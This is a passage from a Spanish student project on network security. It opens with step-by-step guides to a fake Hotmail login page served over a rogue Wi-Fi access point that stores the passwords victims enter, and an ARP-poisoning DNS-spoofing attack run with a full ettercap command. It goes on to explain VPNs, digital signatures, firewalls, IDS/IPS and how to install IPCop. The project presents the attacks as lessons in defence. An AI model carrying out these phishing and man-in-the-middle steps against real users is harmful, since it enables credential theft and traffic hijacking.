Y ahora editaremos el nuevo fichero con esta configuración para asignar la web de Hotmail a nuestra ip.
63
Ya tenemos montado nuestro servidor DNS.
3. Montaje del servidor apache.
Para servidor web hemos decidido usar apache. Lo instalamos a través del gestor de paquetes.
Una vez instalado editaremos el siguiente fichero con esta orden: nano /etc/apache2/sites-enabled/000-default
64
En este fichero introduciremos el directorio donde vamos a poner nuestra página web. En este caso el directorio será: /var/www/Hotmail. Con esto el servidor iniciara con los archivos de esta carpeta.
Ahora crearemos este directorio y le añadiremos los archivos de la web.
Los ficheros: dentro de la carpeta se encuentran las fotos y los .gif que contienen la página web. El archivo login.srf.htm pertenece a la página web. El archivo robetia.php contiene el script que se ejecutará al pulsar el botón “Iniciar Sesión” en cual almacenará los datos introducidos en el archivo robculera.txt. UT.png es una imagen. El robetia.php también podemos configurar que hará en navegador tras a ver introducido la web. Por ejemplo, mostrar web de error…
65
Hecho esto y poniendo en nuestro navegador http://nuestra_ip/Nombre_de_un_archivo nos debería mostrar ese archivo contenido en la carpeta Hotmail. Ahora configuraremos el servidor de tal forma que salga el archivo introduciendo solo http://Nuestra_ip. Para ello tenemos que editar el archivo /etc/apache2/mods-enabled/dir.conf. Dentro veremos que nos aparece una lista a la cual le tenemos que añadir el nombre del fichero que contiene la web de inicio. En nuestro caso login.srf.htm.
66
Comprobaremos el resultado y si todo va bien ya podemos pasar al siguiente punto.
4. Creación del punto de acceso.
Ahora ya está todo configurado. Sólo nos queda crear el punto de acceso para emitir una señal wifi. Para ello tenemos que disponer de dos adaptadores de red, uno para recibir la señal y otro para emitirla. El chipset del adaptador que utilizaremos para emitir la señal ha de ser compatible con modo monitor o promiscuo. Para ponerlo en modo monitor utilizaremos airodump-ng, y para crear el punto de acceso airbase-ng. Todo esto lo podemos encontrar en la suite de aircrack-ng. Lo primero que haremos será instalar esta suite.
67
Ahora pararemos los servicios de dhcp y dns. (Si alguno da fail no hay que preocuparse, cuando creemos las interfaces mostrará OK)
Pondremos una interfaz de red en modo monitor. En este caso pondremos la interfaz llamada wlan0. El programa nos crea una interfaz en modo monitor llamada mon0.
68
Con airbase-ng crearemos el punto de acceso en esta nueva interfaz. En el comando le especificaremos las siguientes opciones: -P: Esta opción capturará todas las conexiones a redes wifi, ya sea a nuestra red o la de nuestros alrededores. -C: Se especifica en segundos cada cuando se comprobará si hay nuevas conexiones a redes. -c: Se especifica porque canal se emitirá la señal. --essid: Se especifica que nombre tendrá la nueva red wifi. -Al final del comendo pondremos que interfaz queremos utilizar para emitir esta señal.
Creado el punto de acceso se nos vuelve a crear una nueva interfaz llamada at0. A partir de este paso no utilizaremos más esta terminal pero tampoco la cerraremos. Abriremos una nueva para acabar de configurar nuestro punto de acceso. Tenemos que configurar esta nueva interfaz con parámetros que correspondan a nuestros servidores DHCP y DNS. Le asignaremos una ip, una máscara de subred y la levantaremos.
69
Ahora asignaremos que el servidor dhcp ha de trabajar con esta interfaz con el siguiente comando: dhcpd3 -cf /etc/dhcp3/dhcpd.conf at0 Ahora activaremos nuestros servidores DNS y DHCP.
Ahora para emitir internet a la gente que se conecte a nuestro punto de acceso tenemos que configurar el ordenador para que funcione como router. Esta configuración la haremos con el siguiente comando: sysctl net.ipv4.ip_forward=1 Este comando lo que hace es poner la variable booleana net.ipv4.ip_forward a 1, es decir activa. Esta configuración no será permanente. Si la queremos fija, tendremos que editarla en el archivo /etc/sysctl.conf pero no es el caso con el comando nos bastará. Entraremos en el archivo para ver para que sirve esta opción.
Solo nos queda configurar las iptables. Iptables nos permiten agregar diferentes reglas que tendrán que cumplir los paquetes que atraviesen nuestra red. Configuraremos la tabla nat de la siguiente manera: Primero nos aseguramos que no existan reglas de iptables cargadas. (si existen se borran) iptables -t nat –F Eth1 es la interfaz por la cual recibimos internet en nuestro ordenador. En este caso la recibimos por cable y la emitimos vía wifi pero también podríamos recibirla por wifi. Todos los paquetes que entren por la interfaz eth1 se redirigen. iptables -t nat -A PREROUTING -i eth1 -j REDIRECT
70
Todos los paquetes que salgan por los ordenadores conectados a la red wifi sean enviados a internet pasando por nuestro PC. Ip masquerade permite que si hay un ordenador conectado a internet, los ordenadores conectados a este también podrán tener internet. iptables -t nat -A POSTROUTING -o eth1 -j MASQUERADE
Una vez implementado el ataque comprobamos que pasaría desde el PC de la víctima. Exploramos redes disponibles.
Nos conectamos.
71
Navegamos con total normalidad.
Pero al entrar en la web de Hotmail…
72
73
Ahora desde nuestro servidor comprobaremos el archivo robculeta.txt…
74
4.2.1 DNS Spoofing DNS Spoofing Este ataque es posible de hacer por culpa de las múltiples vulnerabilidades que tiene el protocolo DNS. Gracias a este ataque podremos redirigir a la víctima a la web que nosotros queramos. Esto puede ser utilizado para ataques de suplantación de identidad, y simplemente para que la víctima visite la web que nosotros queramos. También es un buen método para impedir la navegación por internet de la víctima, si este es nuestro propósito. Lo que haremos, será envenenar las tablas arp del router para que el pc víctima nos envíe la información a nosotros en vez de al router. Todo esto lo haremos con ettercap. Cuando las tablas ARP ya están envenenadas editaremos un archivo llamado etter.dns. Ettercap hará que el PC de la víctima confunda este archivo con el archivo DNS caché (C:\Windows\System32\drivers\etc\hosts).
1. Envenenamiendo de las tablas ARP
Tenemos que cambiar las tablas APR de manera que nuestro PC quede en el lugar del router. Actualmente la tabla APR es la siguiente:
Observamos que paquetes llegarán a la víctima tras ejecutar el ataque:
Despues de ejecutar el comando con ettercap volvermos a explorar la tabla ARP.
75
El ataque lo realizaremos con el pc 192.168.1.35. El envenamiento ARP ha funcionado! La tabla ARP se ha cambiado confundiendo la MAC del router con la nuestra!
2. Modificacion de etter.dns
Ahora configuraremos el fichero que usará el PC de la víctima como DNS caché. Este fichero se encuentra en /usr/share/ettercap/etter.dns. Configuraremos el fichero para que confunda la web www.stucom.com con www.google.es Para ello lo primero de todo será averiguar la ip de www.google.es:
Ya tenemos la ip! Ahora editaremos el archivo para que cualquier manera que intentemos de acceder a stucom.com sea redirigido a google.es.
76
3. Ejecución del ataque
Tenemos que configurar nuestro sistema para que acepte todos los paquetes que detecte, para ello, abrimos una terminal y escribimos: echo 1 > /proc/sys/net/ipv4/ip_forward
Ettercap –T –q –i eth1 –P dns_spoof –M arp // //
Ettercap: software que utilizaremos. -T: Modo texto -q: quiet -i: interfaz que queremos utilizar -P: EL plugin que queremos utilizar. -M arp: Ejecutara el ataque “man in the midle” envenenando las tablas ARP // //: Este es el lugar donde se introducen las máquinas víctimas. Con esos caracteres se ejecuta el ataque a toda la red.
77
4. Comprobando el resultado
stucom.gif
78
4.3 Seguridad 4.3.1 Conceptos de seguridad
4.3.1.1 Autentificación:
Es necesario que cada uno de los gateways que se unan a la VPN asegure estar autorizado. Esta autentificación se realiza mediante certificados digitales. Un certificado está compuesto por un numero identifica torio, PIN, y por un elemento electrónico, que habitualmente es un archivo del ordenador. Si alguien no tiene estos dos elementos, no podrá acceder por ninguna VPN.
4.3.1.2 Confidencialidad:
Ya que los datos viajan por un internet, debemos cifrar el contenido de tal forma que además de nosotros, solamente el receptor sea capaz de interpretar la información. Esto funciona de la siguiente forma: Una vez dentro de la VPN, cada Gateway envía su clave pública a todos los demás. Utilizando la clave pública, la privada y sistemas de encriptación simétricos, se hace imposible la lectura de los datos sin poseer las claves utilizadas para su encriptación.
79
Estas claves han de actualizarse cada cierto tiempo y es peligroso, ya que actualizándolas muy frecuentemente podemos provocar la sobre carga del servidor, pero si tardamos demasiado, ponemos en peligro la clave, y por lo tanto, la información que esta protege.
4.3.1.3 Integridad:
Esto es para asegurarnos que los datos enviados no han sido modificados. Para ellos utilizamos firmas digitales obtenidas a través de algoritmos de hash. La firma digital funciona utilizando un algoritmo hash y un algoritmo asimétrico. Los algoritmos hash toman como entrada un mensaje de bits y dan como resultado esos mismos bits pero cifrados. El contenido cifrado recibe el nombre de Message Digest.
Proceso de Firma Digital
80
1. El usuario escribe el mensaje y especifica que lo quiere firmar digitalmente.
2. El mensaje es comprimido y es pasado al algoritmo hash para generar un Message Digest.
3. El Message Digest es cifrado con la llave privada del usuario.
4. La firma es anexada al mensaje en texto plano y ambos son enviados por correo electrónico al destinatario.
NOTA: La llave privada incluye a la llave pública, por eso puede utilizarse para cifrar datos. La llave pública jamás incluye la llave privada. Verificación de la Firma Digital
1. Separa la firma digital del texto plano.
2. Recalcula el Message Digest del mensaje (sin la firma).
3. Cifra el Message Digest nuevo con la llave publica del remitente
4. Compara el Message Digest recibido con el nuevo.
5. Si son iguales, es que no hubo alteración alguna en el mensaje.
Nota Importante: La firma digital no cifra los mensajes, por eso no se garantiza la confidencialidad de los datos, sólo su autenticidad.
81
El sistema de firma digital brinda Identidad y Autenticidad ya que se sabe quien escribió el mensaje (por el uso de la llave privada). Mediante el uso de algoritmos hash, se puede determinar la integridad del mensaje con exactitud. La no repudiación del mensaje: El que lo firmó no puede decir que no lo firmó. Ya que para poder enviar un mensaje firmado digitalmente, es necesario tener acceso a la PC que tiene la llave privada y además conocer su passphrase. La mayoría de las llaves privadas son guardadas en la PC de forma cifrada. De esta manera, es más difícil para una persona robar la llave y utilizarla. Para poder utilizar la llave privada, se utiliza un passphrase para descifrarla de forma temporal. ¿Qué es el passphrase? El passphrase es una contraseña. Cuanto más larga, más difícil de descifrar mediante el uso de técnicas de criptoanálisis. Si uno se olvida el passphrase, se pierde la llave privada y todos los mensajes que ésta puede descifrar.
4.3.2 Arquitecturas DMZ
82
4.3.2.1 Firewall Un firewall es un sistema de defensa que se basa en la instalación de una "barrera" entre un PC y la Red, por la que circulan todos los datos. Este tráfico entre la Red y el PC es autorizado o denegado por el firewall la "barrera", siguiendo las instrucciones que le hayamos configurado. Un sistema básico de seguridad, que debemos utilizar para nuestra conexión a Internet, es la instalación de un Firewall o cortafuegos.
El funcionamiento de éste tipo de programas se basa en el "filtrado de paquetes". Todo dato o información que circule entre nuestro PC y la Red es analizado por el programa (firewall) con la misión de permitir o denegar su paso en ambas direcciones (Internet-->PC ó PC--->Internet).
83
El comprender esto último es muy importante, ya que si autorizamos un determinado servicio o programa, el firewall no va a decirnos que es correcto o incorrecto, o incluso, que siendo correcto los paquetes que están entrando o saliendo, éstos contienen datos perniciosos para nuestro sistema o la Red, por lo que hay que tener buen cuidado en las autorizaciones que otorguemos. Como ejemplo de esto último podemos poner el Correo Electrónico. Si autorizamos en nuestro firewall a que determinado programa de correo acceda a Internet, y al recibir nuestro correo, en un mensaje recibido viene un adjunto con un virus, por ejemplo tipo gusano, el firewall no nos va a defender de ello, ya que le hemos autorizado a que ese programa acceda a la Red. Lo que si va a hacer es que si al ejecutar el adjunto, el gusano intenta acceder a la Red por algún puerto que no esté previamente aceptado por nosotros, no lo va a dejar propagarse. Ahora bien, si hace uso por ejemplo del mismo cliente de correo, si va a propagarse. La misión del firewall es la de aceptar o denegar el trafico, pero no el contenido del mismo. En éste caso, la misión de protegernos es (además del sentido común de no ejecutar sin más un adjunto) de un programa Antivirus. Un firewall funciona, en principio, DENEGANDO cualquier tráfico que se produzca cerrando todos los puertos de nuestro PC. En el momento que un determinado servicio o programa intente acceder a Internet o a nuestro PC nos lo hará saber. Podremos en ese momento aceptar o denegar dicho tráfico, pudiendo asimismo hacer (para no tener que repetir la operación cada vez) "permanente" la respuesta hasta que no cambiemos nuestra política de aceptación.
4.3.2.2 Proxy
Un proxy es un equipo especial, ya puede ser con un sistema operativo o programa especifico. Este, siempre está colocado al principio de una red para controlar el tráfico entrante, es decir, es un punto intermedio entre un equipo conectado a internet y el servidor al cual se está accediendo. Al navegar por un proxy, se realiza una solicitud entre el proxy y el servidor el cual queremos acceder. Es el proxy el que envía esta solicitud al servidor y nos la devuelve con el resultado, es decir que es este el que nos consulta la solicitud por nosotros.
Ventajas: • Control: sólo el intermediario hace el trabajo real, por tanto se pueden limitar y restringir los derechos de los usuarios, y dar permisos sólo al proxy.
84
• Ahorro. Por tanto, sólo uno de los usuarios (el proxy) ha de estar equipado para hacer el trabajo real. • Velocidad. Si varios clientes van a pedir el mismo recurso, el proxy puede hacer caché: guardar la respuesta de una petición para darla directamente cuando otro usuario la pida. Así no tiene que volver a contactar con el destino, y acaba más rápido. • Filtrado. El proxy puede negarse a responder algunas peticiones si detecta que están prohibidas. • Modificación. Como intermediario que es, un proxy puede falsificar información, o modificarla siguiendo un algoritmo. • Anonimato. Si todos los usuarios se identifican como uno sólo, es difícil que el recurso accedido pueda diferenciarlos. Pero esto puede ser malo, por ejemplo cuando hay que hacer necesariamente la identificación.
Desventajas: En general (no sólo en informática), el uso de un intermediario puede provocar: • Abuso. Al estar dispuesto a recibir peticiones de muchos usuarios y responderlas, es posible que haga algún trabajo que no toque. Por tanto, ha de controlar quién tiene acceso y quién no a sus servicios, cosa que normalmente es muy difícil. • Carga. Un proxy ha de hacer el trabajo de muchos usuarios. • Intromisión. Es un paso más entre origen y destino, y algunos usuarios pueden no querer pasar por el proxy. Y menos si hace de caché y guarda copias de los datos. • Incoherencia. Si hace de caché, es posible que se equivoque y dé una respuesta antigua cuando hay una más reciente en el recurso de destino. En realidad este problema no existe con los servidores proxy actuales, ya que se conectan con el servidor remoto para comprobar que la versión que tiene en cache sigue siendo la misma que la existente en el servidor remoto. • Irregularidad. El hecho de que el proxy represente a más de un usuario da problemas en muchos escenarios, en concreto los que presuponen una comunicación directa entre 1 emisor y 1 receptor (como TCP/IP)
85
4.3.2.3 IDS Un IDS como sus siglas indica, es un sistema de detección de intrusos, puede ser un equipo IDS o un equipo con un programa IDS. Este sistema de seguridad, lo que hace es detectar los accesos no autorizados dentro de una red, ya pueden ser amenazas, ataques, etc… normalmente producidos por hackers. El IDS detecta estas amenazas mediante sensores virtuales, ya pueden ser sniffers o capturadores de paquetes que entran en la red como por ejemplo wireshark o kismet. El IDS, detecta anomalías que entran que pueden ser presencia de ataques o falsas alarmas.
Existen tres tipos de sistemas de detección de intrusos: • HIDS (HostIDS): El HIDS es el que se ocupa de detectar las anomalías de la red
como por ejemplo modificaciones en la red para . El HIDS intenta detectar tales modificaciones en el equipo afectado, y hacer un reporte de sus conclusiones.
• NIDS (NetworkIDS): un IDS basado en red, detectando ataques a todo el segmento de la red. Su interfaz debe funcionar en modo promiscuo capturando así todo el tráfico de la red.
• DIDS (DistributedIDS): sistema basado en la arquitectura cliente-servidor compuesto por una serie de NIDS (IDS de redes) que actúan como sensores centralizando la información de posibles ataques en una unidad central que puede almacenar o recuperar los datos de una base de datos centralizada. La ventaja es que
86
en cada NIDS se puede fijar unas reglas de control especializándose para cada segmento de red. Es la estructura habitual en redes privadas virtuales (VPN).
Los principales métodos utilizados por N-IDS para informar y bloquear intrusiones son:
• Reconfiguración de dispositivos externos (firewalls o ACL en routers): Comando enviado por el N-IDS a un dispositivo externo (como un filtro de paquetes o un firewall) para que se reconfigure inmediatamente y así poder bloquear una intrusión. Esta reconfiguración es posible a través del envío de datos que expliquen la alerta (en el encabezado del paquete).
• Envío de una trampa SNMP a un hipervisor externo: Envío de una alerta (y detalles de los datos involucrados) en forma de un datagrama SNMP a una consola externa como HP Open View Tivoli, Cabletron, Spectrum, etc.
• Envío de un correo electrónico a uno o más usuarios: Envío de un correo electrónico a uno o más buzones de correo para informar sobre una intrusión seria.
• Registro del ataque: Se guardan los detalles de la alerta en una base de datos central, incluyendo información como el registro de fecha, la dirección IP del intruso, la dirección IP del destino, el protocolo utilizado y la carga útil.
• Almacenamiento de paquetes sospechosos: Se guardan todos los paquetes originales capturados y/o los paquetes que dispararon la alerta.
• Apertura de una aplicación: Se lanza un programa externo que realice una acción específica (envío de un mensaje de texto SMS o la emisión de una alarma sonora).
• Envío de un "ResetKill" : Se construye un paquete de alerta TCP para forzar la finalización de una conexión (sólo válido para técnicas de intrusión que utilizan el protocolo de transporte TCP).
• Notificación visual de una alerta: Se muestra una alerta en una o más de las consolas de administración.
4.3.2.4 IPS Un Sistema de Prevención de Intrusos (IPS) es un dispositivo que ejerce el control de acceso en una red informática para proteger a los sistemas computacionales de ataques y abusos. La tecnología de Prevención de Intrusos es considerada por algunos como una extensión de los Sistemas de Detección de Intrusos (IDS), pero
87
en realidad es otro tipo de control de acceso, más cercano a las tecnologías cortafuegos. Los IPS fueron inventados de forma independiente por Jed Haile y Vern Paxon para resolver ambigüedades en el monitoreo pasivo de redes de computadoras, al situar sistemas de detecciones en la vía del tráfico. Los IPS presentan una mejora importante sobre las tecnologías de cortafuegos tradicionales, al tomar decisiones de control de acceso basados en los contenidos del tráfico, en lugar de direcciones IP o puertos. Tiempo después, algunos IPS fueron comercializados por la empresa One Secure, la cual fue finalmente adquirida por NetScreen Technologies, que a su vez fue adquirida por Juniper Networks en 2004. Dado que los IPS fueron extensiones literales de los sistemas IDS, continúan en relación. También es importante destacar que los IPS pueden actuar al nivel de equipo, para combatir actividades potencialmente maliciosas.
88
4.3.3 VPN
La mayoría de empresas actuales están compuestas con más de una oficina. Lo ideal es que todos los ordenadores de todas las oficinas estén en una misma red para poder compartir accesos, grandes flujos de datos…pero eso no es posible ya que no se pueden tener en una misma LAN ordenadores que están a una distancia de 10 kilómetros, por ejemplo
Para solventar este problema, podemos utilizar VPN, que sirve para conectar diferentes redes locales entre ellas. El elemento clave de las VPN son los gateways que se encargan de proteger el contenido que viaja por ellas. Antes de salir a la red pública, los paquetes pasan por el primer Gateway, el de la red local, que se encarga de encriptar la información. Una vez los datos llegan a su destino, antes de entrar en la red deben pasar por el segundo gateway, que es quien desencripta los datos.
89
Tunel de nivel 3: El protocolo pasajero es de nivel 3 (de red). o Pasajero: Protocolo de red (IP, IPX, Apple-Talk…). o Portador: Protocolo de red (IP generalmente). o Encapsulación: GRE, IPSec.
• El router origen del túnel añadirá a cada paquete pasajero (payload) las cabeceras del portador y/o de encapsulación. El pasajero será fragmentado antes de ser encapsulado si es necesario.
90
• El campo TTL de la cabecera IP del paquete pasajero no es modificado una vez encapsulado. Hay sólo 1 salto para el pasajero. Túneles de nivel 2 (de enlace) • Tunel de nivel 2: El protocolo pasajero es de nivel 2 (de enlace). o Pasajero: Protocolo de enlace punto a punto (PPP, HDLC…). o Portador: Protocolo de red (IP…) o enlace (Frame Relay…). o Encapsulación: GRE, L2TP, IPSec. • Permiten la conexión de usuarios remotos a una red privada: VPN (Virtual Private Network) o VPDN (Virtual Private Dial-up Network). • Dos modelos de VPN según su administrador: usuario o ISP.
Esta conexión se realiza a través de un medio inseguro, internet, y es por eso que debemos tener bien protegidos nuestros paquetes. Para hacerlo, es necesario asegurar la autentificación, la integridad y la confidencialidad de nuestros datos utilizando una serie de mecanismos que explicaremos en el apartado de Seguridad.
5. Resultados
Hemos hecho una búsqueda de información en diferentes páginas web de antivirus famoso como Norton, Panda, Nod s en la cual tienen listas de los ataques, vulnerabilidades, spam, etc… producidos. Las empresas encargadas los guardan en una gran base de datos para así saber cada da ataque que se ha producido e incluirlo en seguridad por ejemplo en un antivirus. Concretando en la página web de Symantec:
91
- http://www.symantec.com/business/security_response/index.jsp
Aquí, tenemos unas gráficas de diferentes tipos de Ataques que se producen al día a día, como podremos ver, se producen muchísimos. En esta grafica, se muestra el porcentaje de Spam es decir de publicidad engañosa o fraudulenta que se produce durante todo un año, son unas cifras elevadísimas en que se almacenan cada una de ellas con cada ip. Para así poder bloquear gran parte de tráfico innecesario y no causar tanto tráfico en las redes. Un ejemplo que vemos marcado, es un porcentaje de todo el tráfico de correos que se establece, un Sábado se llega a alcanzar un 95,33% de correos Spam.
En esta otra gráfica vemos un almacenamiento de los ataques producidos en 90 días y dividido por Regiones, se puede observar con diferencia que uno de los continentes que sufre más ataques es América del Norte superando los 40.000.000, y siguiéndole Europa con menos de la mitad.
92
Esto significa que en el mundo se producen millones de ataques en la red, y por eso hay que tener unos mínimos de seguridad para poder protegerse. Ya que de hoy en día como en el trabajo demostramos se pueden establecer infinidad de ataques. Y por eso empresas de antivirus como Symantec, hacen estudios y coleccionan grandes cantidades de información como Virus, Troyanos, Gusanos, incluso bromas a continuación podemos ver una lista sobre alguno de los millones que se producen en un día:
Esta última gráfica, vemos un “estudio” de todas las últimas amenazas globales, riesgos y vulnerabilidades que se producen, ya sean por errores de programación, errores de sistema, etc.…
93
Por ejemplo aquí vemos una vulnerabilidad que han publicado y si la clicamos vemos que error tiene. Este, vemos que Microsoft Visio es propenso a una vulnerabilidad remota de ejecución de código, el problema se produce cuando la aplicación procesa un archivo malicioso. Y seguidamente, salen recomendaciones para poder evitar estos conflictos, como ejecutar el programa con un usuario sin privilegios o derechos mínimos.
94
6. Conclusiones y líneas futuras
En este trabajo hemos aprendido varios conceptos de seguridad informática y lo más importante de todo es que ya sabríamos como montar una pequeña red. Tendríamos que mejorar varios varias configuraciones pero hemos conseguido tener una importante base en este tema. Al realizar el ataque del Unicode, nuestra intención no era demostrar que podemos acceder a un servidor con Windows 2000 y el IIS v5.0 instalado. Lo que queríamos demostrar es que los bugs existen y no solo en el IIS, por lo tanto utilizando estas vulnerabilidades podríamos acceder a muchos sistemas. Por lo tanto tenemos que actualizar siempre nuestras aplicaciones y a poder ser el sistema operativo en el que corren. En la creación de nuestro Windows Messenger nos hemos dado cuenta que con la utilización de herramientas conocidas y conocimientos de programación podemos crear ataques, que no acaban de ser virus pero podríamos decir que producen el mismo efecto. Si al ejecutar algún archivo no hace nada, deberíamos sospechar, e intentar abrir el ejecutable con algún programa de compresión. Descifrando una clave web nos damos cuenta que la informática avanza muy rápidamente. Las claves webs fueron creadas a base de algoritmos y se preveía que iban a ser vulnerables hasta dentro de unos 10 años. Con los avances informáticos y la mejora de chipsets en los dispositivos wireless se consiguió explotar estas claves y se vieron obligados a crear un nuevo protocolo con nuevos algoritmos. Todas nuestras claves wifi deberían estar en WPA2. El ataque de phising nos enseña a no fiarnos de los correos “tontos” que recibimos continuamente de cadenas de correos. Este ataque consiste en “pescar” enviar un correo a gente para ver si “pican” e introducen su user y pass en una página falsa. Con la creación del punto de acceso, queremos demostrar que no nos tenemos que fiar en este tipo de conexiones. Si nos conectamos en una red ajena, deberíamos evitar introducir datos privados mientras navegamos. Suplantación de identidad: Este ataque es muy parecido al anterior. Se usa la misma página web falsificada pero en este caso no vamos a “pescar” a base de cadenas de correos, lo que hacemos es hacer pensar a la víctima que esta introduciéndose, ella misma en una web de Hotmail falsa. Y en este último ataque, DNS spoofing, demostramos las vulnerabilidades que tiene el protocolo DNS. Cualquiera que se introdujese en nuestra red podría atacarnos de esta forma, también para hacer suplantación de identidad, obligarnos a que visitemos su página web, dejarnos sin conexión…y protegernos de esto no es nada fácil. Por lo tanto tenemos que procurar que nadie se introduzca en nuestra red y configurar la caché de nuestro DNS para que sea menos vulnerable.
95
Linias futuras. Nos gustaría que este trabajo hubiera podido ser más extenso, pero por la falta de materiales, tales como ordenadores, puntos de acceso…no hemos podido hacer nada más. Si en un futuro pudiésemos continuar el trabajo y ampliar un poco más nuestra pequeña red, nos gustaría añadir una serie de pasos más:
- Enlazar una base de datos de Active Directory con nuestro proxy para que queden todos los logs registrados con el nombre de usuario.
- Poner más equipos de seguridad como añadir un syslog, que todos los logs se guarden en el con las horas de cada programa sincronizadas entre ellas.
- También tendríamos que mejorar la monitorización de nuestros componentes de red utilizando programas como ‘PRTJ’ que nos mostraran gráficos y información de el uso de los componentes de nuestra red. CPU, memoria RAM…
- Mostrar más vulnerabilidades de servidores y protocolos.
96
7. Anexo
7.1 Configuración del firewall
Despues de descargar y grabar la imagen en un CD, la introduciremos en el Pc he configuraremos la BIOS para que arranque desde este, si no está ya configurada. Esta sera la primera pantalla de bienvenida que veremos.
En esta pantalla pulsaremos intro para seguir con la instalación. La siguiente pantalla nos dará a elegir un idioma para continuar.
97
Ahora nos mostrara otro mensaje que nos indica el comienzo de la instalación.
Nos muestra las opciones de origen de instalación. Nosotros instalaremos desde CD.
98
Aquí confirma que se instalara en el disco duro y se hará un particionado
Carga de los ficheros del IPcop
99
Aquí nos pregunta si tenemos una copia de seguridad del sistema para crearla:
Aquí escogemos la tarjeta de red que queremos utilizar en cada interfaz:_
100
Aquí detecta la tarjeta de red que hay configurada ( Realtek…)
Aquí le introducimos la IP y la máscara de red que queramos que tenga la interfaz:
101
Aquí ya tenemos la instalación de IPCop ya instalado, y nos muestra como acceder desde el navegador: http://ipcop:81 o https://ipcop:445
Seguidamente asignamos en que idioma queremos que esté el teclado.
102
Y la zona horaria en la que nos encontramos.
Aquí se asigna el nombre del ordenador.
103
Y seguidamente el nombre del dominio en la cual pertenece el
Aquí nos muestra que el RDSI tiene que estar inhabilitado
104
Ahora pasamos a crear la configuración de la red. Para asignar las diferentes interfaces:
Ahora escogemos una interface para configurar la red de IPcop:
105
Primero empezamos a configurar la interface de color verde, ya que cada interfaz tiene un color asignado.
Y aquí ya tenemos asignado un color a cada tarjeta de red.
106
Una vez asignadas las tarjetas de red con cada color, asignamos una ip y una máscara.
107
Seguidamente pasamos a configurar la naranja
Y escogemos que la IP sea estática en la interfaz conectada a internet:
108
Finalmente establecemos el DNS y el Gateway que van a tener esta interficie (roja)
Y la configuración del DHCP cómo el rango de ip’s
109
Seguidamente viene la seguridad con contraseñas para el usuario root:
La contraseña de administrador:
110
Y la contraseña de la copia de seguridad:
111
Y ya hemos terminado la configuración:
Finalmente aquí ya tenemos la interfaz del IPcop. Y introduciendo el usuario y la contraseña, ya entramos en la consola, si queremos modificar la configuración anterior introduciremos el comando setup.
112
113
7.2 Manual IPcop
Una vez tenemos el ipcop instalado, podemos entrar a la interfaz visual desde el navegador introduciendo https:// 192.168.2.1:445 y obtenemos el certificado de seguridad:
Y entramos con el usuario establecido en la configuración: de admin
114
Vemos al entrar que hay una actualización pendiente
Aquí nos dice que todas las actualizaciones ya están instaladas.
115
Ahora lo configuramos para poder acceder desde ssh
Una vez configurada la sesión de ssh, abrimos el puerto 222 para poder acceder.
Y seguidamente abrimos los puertos para poder entrar remotamente el 222 para poder entrar con el putty y el 445 para poder acceder con el teamviwer
116
Estas son las opciones del proxy y vemos que es muy sencillo,
Para eso, con un ftp introduciremos unos plugins, copiando los directorios dentro del IPcop. Son complementos para poder mejorar las opciones de del Firewall Insertamos los plugins mediante un gestor de ftp para Linux
117
Seguidamente, establecemos una conexión con el putty para poder acceder a los archivos del Ipcop
118
Aquí descomprimimos los archivos insertados para poder proseguir a la instalación.
Instalamos los plugins…
119
Y finalmente vemos que los plugins ya están instalados y que tenemos muchas mas opciones en el IpCop
Y proseguimos a instalar los siguientes paquetes y repetir las operaciones anteriores:
120
Descomprimir los archivos:
121
Instalarlos:
122
Y finalmente poner en marcha el servicio del plugin e instalamos otro plugin (block out traffic)
Y aquí editamos la configuración del plugin (blockout traffic)
123
Seguidamente entramos al router para poder hacer los siguientes ajustes:
Y abrimos los puertos 222 y 445 del router para ahora poder acceder desde fuera de la red. Así poder hacer la configuración remotamente.
124
Y ahora establecemos una configuración en el router para poder acceder remotamente dentro del router y así poder editar configuraciones remotamente, hemos puesto la 0.0.0.0 para que pueda entrar cualquier ip.
125
E introducimos una contraseña para que no pueda entrar algún desconocido.
Y repetimos el proceso para tener mas plugins así asegurarnos la seguridad del proxy
126
127
Y proseguimos a la configuración de del plugin insertado (addons Server 2.3)
128
Aquí vemos el resultado de la aplicación Addons, sirve para poder instalar las aplicaciones subiendo directamente el archivo, aquí vemos una prueba que se sube una aplicación
Y aquí vemos como el Addoms ha funcionado correctamente con el plugin que hemos subido.
129
Y finalmente para guardar toda la configuración del IPcop hacemos una copia deseguridad para así tener guardado el sistema
130
8. Glosario
Internet: Es un conjunto de redes unidas entre sí, que se intercomunican entre ellas para unir todos los nodos. Shell: Se le llama así a la pantalla que permite la utilización del ordenador sin interfaz gráfica, únicamente a través de comandos. Hacker: Es una persona la cual aprovecha vulnerabilidades o explota sistemas informáticos para ver la información o copiarla y con el fin de beneficiarse a sí mismo. Red: Es un conjunto de ordenadores, la cual están conectadas entre sí mediante cables o señales, para un fin de compartir datos e información. Capas OSI: Las capas de la OSI son un estándar que utilizan todos los ordenadores para poder enviar los datos de una forma y que el que lo reciba pueda descifrarla de esa misma forma. Servidor: Es un ordenador con más recursos de lo normal, que sirve para dar servicios a otros ordenadores, como por ejemplo dar un servicio web, una base de datos, etc… DNS : El dns es un protocolo que se encarga de traducir los nombres de dominio, en su ip . “Dicho de forma sencilla, el DNS sería un listín telefónico en el que buscando el apellido de una persona (Domaulas.es) obtenemos su número de teléfono (89.248.106.100).” DHCP: Es un protocolo encargado de enviar ip’s a los ordenadores automáticamente desde un rango asignado. Conforme los ordenadores van enviando peticiones para recibir una ip, el protocolo envía las ip’s del rango establecido. FTP: Es un protocolo encargado para la transferencia de archivos. La cual existen diferentes formas de usarla, cómo web o con programas como Filezilla.
131
Telnet: Es un protocolo de red orientado a conexión para acceder a otra máquina y así poder tener el control de la máquina. SSH: Es un protocolo muy parecido al telnet, pero seguro, la información de este viaja encriptado de forma que si algún sniifer captura estos paquetes no podrá descifrar la información que viaja dentro de ellos. Además, existen programas con interfaz gráfica que te permiten la transferencia de archivos mediante este protocolo. Hub: Es un dispositivo que permite dividir las entradas de red para así conectar más ordenadores en una red. Según las bocas que tenga el Hub. Y retransmite todos los paquetes a todos los ordenadores conectados Switch: Es un dispositivo muy parecido al hub pero más “inteligente” , a diferencia del Hub los paquetes que recibe los envía al destinatario únicamente. Puerto: Es una interfaz la cual divide los tipos de datos según los protocolos. Unix: Es un sistema operativo bastante antiguo, del cual se han basado muchos de los sistemas operativos que hay ahora. Cable cruzado: Es un cable de red con entradas Ethernet el cual permite conectar dos ordenadores sin ningún dispositivo por medio. Bugs: Es un fallo o error de programación en un sistema o programa que puede ser aprovechado por hackers
132